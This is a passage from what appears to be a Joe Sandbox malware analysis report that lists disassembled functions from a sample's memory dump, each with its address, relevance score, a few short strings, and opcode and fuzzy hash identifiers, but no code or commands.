Function 04B9C210 Relevance: 1.4, Strings: 1, Instructions: 141COMMON

Download Yara Rule

Strings

(cq, xrefs: 04B9C2A1

Memory Dump Source

Source File: 00000004.00000002.1359860570.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4b90000_file.jbxd

Similarity

API ID:
String ID: (cq
API String ID: 0-301743287
Opcode ID: 40747267a25564fc9feaa44a9999c5b80d5f7a6371de65b1594b73bad297f9e1
Instruction ID: 509e0ce24456dcb200bccd91e3e08c4815779798bb18c44d1b0c1ed73abba3bc
Opcode Fuzzy Hash: 40747267a25564fc9feaa44a9999c5b80d5f7a6371de65b1594b73bad297f9e1
Instruction Fuzzy Hash: 3241D0357046604FEF29ABB8952416E3BE3EFC971471544FAD80ACB395EF24ED028395

Function 04B926E4 Relevance: 1.3, Strings: 1, Instructions: 99COMMON

Download Yara Rule

Strings

cTM, xrefs: 04B93812

Memory Dump Source

Source File: 00000004.00000002.1359860570.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4b90000_file.jbxd

Similarity

API ID:
String ID: cTM
API String ID: 0-1667893526
Opcode ID: c1b3916d46f9c8662c07cda624620b591fba988a9afd4247f710b35c300f2aca
Instruction ID: cf69abfc25009b5e250c4b435abb5ff59493bd9d42b1f8e9bd4b67c4a17bef54
Opcode Fuzzy Hash: c1b3916d46f9c8662c07cda624620b591fba988a9afd4247f710b35c300f2aca
Instruction Fuzzy Hash: 3941D1B1D00209DBDF20CFA9C984A9DBBF5FF48304F248169D808BB214D7756A49CF90

Function 04B9376C Relevance: 1.3, Strings: 1, Instructions: 98COMMON

Download Yara Rule

Strings

cTM, xrefs: 04B93812

Memory Dump Source

Source File: 00000004.00000002.1359860570.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4b90000_file.jbxd

Similarity

API ID:
String ID: cTM
API String ID: 0-1667893526
Opcode ID: 8edb67097de6f9a3624bb3fef280272cc81345851b85a7e5de1e1a66f6a01040
Instruction ID: 05889d0627e19c7a016a2a312a3a297bf3896c2ad0e0fd295d5a07fb4527e852
Opcode Fuzzy Hash: 8edb67097de6f9a3624bb3fef280272cc81345851b85a7e5de1e1a66f6a01040
Instruction Fuzzy Hash: EE41BFB1D00209DBDF20DFA9C984A9EBBF5FF48304F24816AD408BB255D7756A4ACF94

Function 04B93670 Relevance: 1.3, Strings: 1, Instructions: 83COMMON

Download Yara Rule

Strings

cTM, xrefs: 04B936A3

Memory Dump Source

Source File: 00000004.00000002.1359860570.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4b90000_file.jbxd

Similarity

API ID:
String ID: cTM
API String ID: 0-1667893526
Opcode ID: 1b701cbb754ce3393580815d893caeac6d1d36595d25ee0e73ef0ac246b93c44
Instruction ID: 7e5d561f190153b4966e290c0d9e6192f6ecd60cd00a56f28d00aedbb191a9c6
Opcode Fuzzy Hash: 1b701cbb754ce3393580815d893caeac6d1d36595d25ee0e73ef0ac246b93c44
Instruction Fuzzy Hash: 1B210771A002048FDB05DF78C4485AFBBE6EF85314715C9EAE506DB351EB71ED0A8BA1

Function 04B93064 Relevance: 1.3, Strings: 1, Instructions: 83COMMON

Download Yara Rule

Strings

Hcq, xrefs: 04B9528E

Memory Dump Source

Source File: 00000004.00000002.1359860570.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4b90000_file.jbxd

Similarity

API ID:
String ID: Hcq
API String ID: 0-419967981
Opcode ID: fcc9f889852de8f179195ddf7d1c66ea10c0a4649df4696115d90a46881c3b47
Instruction ID: 6e6b5160050a5dcc3bad4762bdf6c8cf9880f184d196b1c7bf7d1a5d1b8614c3
Opcode Fuzzy Hash: fcc9f889852de8f179195ddf7d1c66ea10c0a4649df4696115d90a46881c3b47
Instruction Fuzzy Hash: 2B218030740204AFDB28EB78C49496F7BE6EF89710B5448AEE40ADB755DE35EC46C7A0

Function 04B93660 Relevance: 1.3, Strings: 1, Instructions: 77COMMON

Download Yara Rule

Strings

cTM, xrefs: 04B936A3

Memory Dump Source

Source File: 00000004.00000002.1359860570.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4b90000_file.jbxd

Similarity

API ID:
String ID: cTM
API String ID: 0-1667893526
Opcode ID: cee616999b57550930f0eed06bfb52a3fb6b22cc8f4540d99a50842227f8ee96
Instruction ID: 3be514f0855b829dadb4bee73ffb13fb86641e11d3f130399b420bb9a734e927
Opcode Fuzzy Hash: cee616999b57550930f0eed06bfb52a3fb6b22cc8f4540d99a50842227f8ee96
Instruction Fuzzy Hash: 1321E771A001049FCB04EF68D4455AEBBF6EF84714B1089EAE9069B315EF71EE098B91

Function 04B99C90 Relevance: .7, Instructions: 730COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1359860570.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4b90000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73bd401a5dfcebaaeefd1e806015bd16eef01935fb257888c9842b1129f90c52
Instruction ID: 3565b0b7a795f1fc1f4634488257e95ebbaf209a429474a8da0b59367a94d4a2
Opcode Fuzzy Hash: 73bd401a5dfcebaaeefd1e806015bd16eef01935fb257888c9842b1129f90c52
Instruction Fuzzy Hash: DC722C31E10609CFDB14EF68C89469DBBB1FF45304F0586A9D549AB265EB30AEC5CF81

Function 04B96C10 Relevance: .6, Instructions: 551COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1359860570.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4b90000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe64d81e10a82556aa22a57f2f4d14f01595605c997cbfee23bd5f5f734e1095
Instruction ID: fd06babd30faaa538768c8772c4b19071394e25dc2103c3a84357229f4eb2ca3
Opcode Fuzzy Hash: fe64d81e10a82556aa22a57f2f4d14f01595605c997cbfee23bd5f5f734e1095
Instruction Fuzzy Hash: 1F42B331E1061ACBDF14DFA8C89469DB7F1FF89304F1586A9D459BB261EB30AE85CB40

Function 04B9B928 Relevance: .5, Instructions: 500COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1359860570.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4b90000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8469164397b21efa29d61f2fbdcf2538a4b193b9a383a6b62eb9fb5f63d96082
Instruction ID: 1c29f6ade773e583a62d7f14586028272eabbdb0de174d1951e5e4d5e7075806
Opcode Fuzzy Hash: 8469164397b21efa29d61f2fbdcf2538a4b193b9a383a6b62eb9fb5f63d96082
Instruction Fuzzy Hash: C422F234A00615CFDB14DF69D894A9DBBF2FF89304F1486B9E40AAB365EB30AD45CB50

Function 04B9E180 Relevance: .4, Instructions: 351COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1359860570.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4b90000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e884ef07cd4e473f2a79b46c44c03e8fcad5e0b151124ee50c35dd386452d2e
Instruction ID: 10e953bd30929a7879d77c2f70f98e470a5b88d9f4b9cab2f58c21579e4caeca
Opcode Fuzzy Hash: 9e884ef07cd4e473f2a79b46c44c03e8fcad5e0b151124ee50c35dd386452d2e
Instruction Fuzzy Hash: FFE1CD78705200DFDB29DF78C45866D7BF2EF89706B2448BAE50A9B3A0DA35EC41CB51

Function 04B96C00 Relevance: .3, Instructions: 335COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1359860570.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4b90000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 324749e146326d58f641a4d3ea0478bb677f0de59fa2feb25666929e5149f084
Instruction ID: fd4a6069fab9ababf25268d3ab771567398c0dab224ee57ce26f8e37a4a8892d
Opcode Fuzzy Hash: 324749e146326d58f641a4d3ea0478bb677f0de59fa2feb25666929e5149f084
Instruction Fuzzy Hash: 44E1E431E10619CBDF24DFA8C8946EDB7F1FF89304F1586A9D419AB251EB30AE85CB40

Function 04B96BE0 Relevance: .3, Instructions: 333COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1359860570.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4b90000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 099564d7cdba19da29b08d3fceb60b732cfbf26649ab9e2e94cdca976834e9f1
Instruction ID: eb86a149e6053dd3e5f2fad49fc0eb67cc511a2ae3aea0eafe3629d53610826c
Opcode Fuzzy Hash: 099564d7cdba19da29b08d3fceb60b732cfbf26649ab9e2e94cdca976834e9f1
Instruction Fuzzy Hash: 5AE1E231E10619CBDF24DFA8C8946EDB7F1FF89314F1586A9D419AB261EB30AD85CB40

Function 04B9B560 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1359860570.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4b90000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae7e19bc801b04ca86d4f5cf939e0de1be8abef513b0fa1386233c00bec75b8a
Instruction ID: 4b60d4af55d2e6fd467b501c72cf452c62e3a0cb12960e6348a711359ac18c9c
Opcode Fuzzy Hash: ae7e19bc801b04ca86d4f5cf939e0de1be8abef513b0fa1386233c00bec75b8a
Instruction Fuzzy Hash: E7C1C434E106198FCF14DF69C894A9DB7B1FF89304F1586A9D449AB261EB30BE85CF50

Function 04B9B530 Relevance: .2, Instructions: 225COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1359860570.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4b90000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2bc2e7448167683a11b0856851098deb49c8939f9b227bc8ab3675ab1b4acca
Instruction ID: 00cf5949f57776501522b45ba106892cc3af8e39788575555af7d2c9297de294
Opcode Fuzzy Hash: c2bc2e7448167683a11b0856851098deb49c8939f9b227bc8ab3675ab1b4acca
Instruction Fuzzy Hash: B6A1D735E10619CFCB14DF68C884A98B7B1FF89304F1586E9D449AB221EB71BD89CF50

Function 04B99620 Relevance: .2, Instructions: 197COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1359860570.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4b90000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d3f667ac527eb6a10cfdafcd4a1e048d106a268df55cc574780c567bfe548203
Instruction ID: a705902158629483f1c03314d08d67021af9505091ff9f037c9360ff83a2a38c
Opcode Fuzzy Hash: d3f667ac527eb6a10cfdafcd4a1e048d106a268df55cc574780c567bfe548203
Instruction Fuzzy Hash: 8C91D57590060ADFDB41DF68C884999FBF5FF89310B14879AE819AB355EB30E985CF80

Function 04B9C010 Relevance: .2, Instructions: 178COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1359860570.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4b90000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f41fd8f63293394f902b9ce88e0d9b812d96995af0602dd92233ff3eae47f4ef
Instruction ID: 14b5708fe533053c7ebac02ecb5de658541785939bf5ab8a138206f44cf52773
Opcode Fuzzy Hash: f41fd8f63293394f902b9ce88e0d9b812d96995af0602dd92233ff3eae47f4ef
Instruction Fuzzy Hash: 455128347002158FDB18EF69D8949AE7BF6FF89704B1444A9D406EB361DB35EC06CB60

Function 04B989B0 Relevance: .2, Instructions: 176COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1359860570.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4b90000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b86dce77d8f89adfb043c76071182abff8b89a95c6944f4629876611635b8e0
Instruction ID: c83fac0be660c4efd29fbe6c1621ee77e61ca19f12ca0d7954cb3f83c9f287b5
Opcode Fuzzy Hash: 5b86dce77d8f89adfb043c76071182abff8b89a95c6944f4629876611635b8e0
Instruction Fuzzy Hash: 7A71CCB9300A008FCB18DF29C488959BBF2FF8971571589A9E54ACB372DB72EC45CB50

Function 04B989A0 Relevance: .2, Instructions: 174COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1359860570.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4b90000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00b1f3af9cf9a8c07d98c12c3aa37adcc6db541c16fe014501766fefd9291b74
Instruction ID: ae78296a50c19612747c32aeca6c37a0f62d083fd03caeb59f40a70b77ec9046
Opcode Fuzzy Hash: 00b1f3af9cf9a8c07d98c12c3aa37adcc6db541c16fe014501766fefd9291b74
Instruction Fuzzy Hash: 6371E0B9700A008FCB18DF29C488959BBF2FF8931471589A9E54ACB372DB72EC45CB50

Function 04B987C0 Relevance: .2, Instructions: 172COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1359860570.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4b90000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86fbf679ad0419e71c11fad59430563507b867544a875303339b1bad49e86bd6
Instruction ID: 7248a6a921c94742d04eaf697b4b39a9d67088f63bf83a396a16775ab05293b2
Opcode Fuzzy Hash: 86fbf679ad0419e71c11fad59430563507b867544a875303339b1bad49e86bd6
Instruction Fuzzy Hash: 36719EB4A012068FCB04DF69D584999FBF1FF49314B1986A9E84ADB316E734EC85CF90

Function 04B9B918 Relevance: .2, Instructions: 164COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1359860570.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4b90000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: daea2985188545a0be825397c89db5ef7acca922b6bf3626c00f190b763145af
Instruction ID: 20a85d55e47faee5336df95c7ae8adef1c767a5bb650459da40d2b0a47d21040
Opcode Fuzzy Hash: daea2985188545a0be825397c89db5ef7acca922b6bf3626c00f190b763145af
Instruction Fuzzy Hash: 466145306106008FDB14EF69D898B9D77F2FF89314F1486B9E51A9B3A5DB70AD098B60

Function 04B9F6FF Relevance: .2, Instructions: 160COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1359860570.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4b90000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 094baf64793f438d87a6338f3182dc5e5c250556b4113dacdf1969331267942e
Instruction ID: a626dfb576e1181d21e1eb048d4db1296e274cc00629a037078710b8f68f9089
Opcode Fuzzy Hash: 094baf64793f438d87a6338f3182dc5e5c250556b4113dacdf1969331267942e
Instruction Fuzzy Hash: A4615E34A10619DFDF00EFA8D8549AEFBB1FF89300F108569E446A7354EB34AD95CB81

Function 04B9F700 Relevance: .2, Instructions: 160COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1359860570.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4b90000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2ec9e91c3a07fe5d556c524867f968e7612155477c3efd62a4cfe07e805f335
Instruction ID: ef165d44c7f7fe9bd82921d908ce2f219b0d7956f94b9317c85a9943bc5ea673
Opcode Fuzzy Hash: c2ec9e91c3a07fe5d556c524867f968e7612155477c3efd62a4cfe07e805f335
Instruction Fuzzy Hash: 0C615D34A10619DFDF00EFA8D8549AEFBB5FF89300F108569E446A7354EB34AD95CB81

Function 04B926A8 Relevance: .2, Instructions: 158COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1359860570.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4b90000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3ceb3df8d5529b55e42b1fe420d96ffcef6da7ef8fd8783f873b6b6d7cd645f
Instruction ID: f9f4d67b6a6f4df210a7d8d1c90434521f35b510703478db7a1ae62d35a875e6
Opcode Fuzzy Hash: a3ceb3df8d5529b55e42b1fe420d96ffcef6da7ef8fd8783f873b6b6d7cd645f
Instruction Fuzzy Hash: 8D515171E002499FDF54DFA9C844AAFBBF5EF88310F14886AE455E7250DB74AD05CBA0

Function 04B99610 Relevance: .1, Instructions: 149COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1359860570.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4b90000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da3e71fc5cbb16d212e2422c71e1ced62b1f9bfdb572d7354d0c3daf44d1a3dc
Instruction ID: 52a34ef7141818f1c50ca53dbc33bdcbd1683fcb71b5a7c6e4b164c0e6369a0b
Opcode Fuzzy Hash: da3e71fc5cbb16d212e2422c71e1ced62b1f9bfdb572d7354d0c3daf44d1a3dc
Instruction Fuzzy Hash: 6461E77590070ACFCB51EF68C884999FBF1FF49310B14879AE859EB255EB70E985CB80

Function 04B9ACA8 Relevance: .1, Instructions: 137COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1359860570.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4b90000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b9ddd76930af426d8919768aeff24331a027ac44a327c4c8b3687ecc658cb692
Instruction ID: 0616da63c578ab37fc2d8bd13fc30b0a6ec336609b947fc9b59921c581e7dd05
Opcode Fuzzy Hash: b9ddd76930af426d8919768aeff24331a027ac44a327c4c8b3687ecc658cb692
Instruction Fuzzy Hash: 00513575A00259DFCF04DF94D984AADBBB0FF88310F1581A9E806AB254E770AE55CF90

Function 04B9309C Relevance: .1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1359860570.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4b90000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ace4c5b9486d95617f36ac3a4cc1d59675a98baf023bcea646ffd1ff854f50a
Instruction ID: d66a228cbeff93aaf1b044fef4223e03726a9cd3277e453ffe837358aba1176a
Opcode Fuzzy Hash: 3ace4c5b9486d95617f36ac3a4cc1d59675a98baf023bcea646ffd1ff854f50a
Instruction Fuzzy Hash: ED318B70A02208DFCF18DFA4E5945AEFBB2FF89304F1185AAE44267264CB30AC56CF50

Function 04B97899 Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1359860570.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4b90000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9fcf6380a6b20bdc49d757dbc724938778bd4266be15e4f1ed02785cfadf67a4
Instruction ID: 1627f6155932977ab122b3158d6be93d1f026a1d5cd4339f71d3c30c588020c9
Opcode Fuzzy Hash: 9fcf6380a6b20bdc49d757dbc724938778bd4266be15e4f1ed02785cfadf67a4
Instruction Fuzzy Hash: 3E413F34A10719CFCB04EF78C4949DDBBB2FF89304F0185A9E519AB365EB71A946CB81

Function 04B978A8 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1359860570.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4b90000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f8f423e69bf75700da80b80e007e88d83aa7730d024b104d710d7505d466064
Instruction ID: ef43f414b8722fe0b7a4195381e28f1768e7107f2494dfae246586df294f7a99
Opcode Fuzzy Hash: 1f8f423e69bf75700da80b80e007e88d83aa7730d024b104d710d7505d466064
Instruction Fuzzy Hash: 82411D34A10709CFCB04EF78C99499DBBB6FF89304F018569E519AB325EB71A946CB81

Function 04B987AF Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1359860570.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4b90000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 794afc97cb30bb64a6cbd8b805298ebe1a06882c478254062bfbaae3c7f182ba
Instruction ID: edb01f7f04affde46cebbcec9b6da35391908877787b6b1aea5a997c0b5e5406
Opcode Fuzzy Hash: 794afc97cb30bb64a6cbd8b805298ebe1a06882c478254062bfbaae3c7f182ba
Instruction Fuzzy Hash: B9411DB4A012068FCB15DF68C5C4999FBF1FF4A350B1986A9D849DB352E734EC46CB90

Function 04B95617 Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1359860570.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4b90000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35892c5832d60d5a41d7d4515fe7f6af40f3aac0d03e2de7dfbe941796d40dba
Instruction ID: fca2720fed0f17953599060cd4a341e0d6db35335af93d60353f0112756d4a1f
Opcode Fuzzy Hash: 35892c5832d60d5a41d7d4515fe7f6af40f3aac0d03e2de7dfbe941796d40dba
Instruction Fuzzy Hash: 7541F675A0020ADFCB44DF68D98499AFBB5FF49314B14C6A9E918EB311E730E985CF90

Function 04B9269C Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1359860570.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4b90000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a2938cb9d702875aa89533a5861514c907450817fbfcd11555024559e1db727
Instruction ID: b17519fc8c1843db94e260489a2e6c3b5a2aa205a781c4299c06296067b651a0
Opcode Fuzzy Hash: 6a2938cb9d702875aa89533a5861514c907450817fbfcd11555024559e1db727
Instruction Fuzzy Hash: 2741BEB0D103589BDB14CFAAC884A9EFBF1FF48714F20826AE818BB254D7746945CF91

Function 04B9C820 Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1359860570.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4b90000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 23351ca82739defad93077f4922f2e772fa49bc973e41b9574a4eb718f9459a5
Instruction ID: 49706731c10dfa2cb562844c74d4088cb4255fe044194e67196256298b9fe147
Opcode Fuzzy Hash: 23351ca82739defad93077f4922f2e772fa49bc973e41b9574a4eb718f9459a5
Instruction Fuzzy Hash: 1E314B75B101049FEB18DB69C8949AEBBF5EF8C720F1540A9E805E7361DA31ED01CBA0

Function 04B95628 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1359860570.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4b90000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3a6099e7ddd47c4c683285e73f8a3c13436a3ffecdbd6d52072a6d03fe10be2
Instruction ID: e0dc1fee25c82cd03ddcbf5da1ac365b6eaddbb4d390b47a0fb5c3aeeec87504
Opcode Fuzzy Hash: f3a6099e7ddd47c4c683285e73f8a3c13436a3ffecdbd6d52072a6d03fe10be2
Instruction Fuzzy Hash: 05410575A0020ADFCB44DF68D98499EFBB5FF49314B14C6A9E918AB311E730A985CF90

Function 04B977A0 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1359860570.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4b90000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8cfce1a87767bcba92dbdbc7c1d579de6705d13643fc1b6478be58dae4269182
Instruction ID: dee78f841944e7ef95b7f26d9e234963af8a392fefb5b65f105058a201078517
Opcode Fuzzy Hash: 8cfce1a87767bcba92dbdbc7c1d579de6705d13643fc1b6478be58dae4269182
Instruction Fuzzy Hash: C8317C35B11219DFCF04EFA8D8448DDB7B6FF88224B048569E506AB310EB35BD06CB80

Function 04B96208 Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1359860570.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4b90000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d00639f61e13e23d321bc1eaa39f4a494515c85a1855a4e64dd42f5c067fd88
Instruction ID: 675bd8033a1812fec3a553487218711434c10daec526cf04a7a20eb7846294a7
Opcode Fuzzy Hash: 4d00639f61e13e23d321bc1eaa39f4a494515c85a1855a4e64dd42f5c067fd88
Instruction Fuzzy Hash: 252171323541118FDB149B2DC8C86697BE5EF89721B1985F6E10ADF3A6EA35EC048B90

Function 04B938F3 Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1359860570.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4b90000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8832936750ebb0d982d6425919b34ce48d5ab6d7136875d5367d85caf6f107c6
Instruction ID: 23bca5a89520cfa70b3e99e33498080d2ff386cb89327669a39c7f56de810189
Opcode Fuzzy Hash: 8832936750ebb0d982d6425919b34ce48d5ab6d7136875d5367d85caf6f107c6
Instruction Fuzzy Hash: AE21A271E005466FDF15DBA9C8409BFBBFAEFD8304B1089AAE455D3254DA709E01C7A0

Function 04B9C11F Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1359860570.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4b90000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 104da5e9638a0decf9ab18fe1e83f4ab8b8831acffd34ad2db41e95e1e1e3d96
Instruction ID: 5dee005f776f9ec236bac36055e38d86cafb6b185776e652cf539700b04aef06
Opcode Fuzzy Hash: 104da5e9638a0decf9ab18fe1e83f4ab8b8831acffd34ad2db41e95e1e1e3d96
Instruction Fuzzy Hash: 7921AC347042508FCB19AB28D49896E7FE2FFC971072485AEE406CB3A1DB34EC0AC761

Function 04B94AB8 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1359860570.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false

Joe Sandbox IDA Plugin

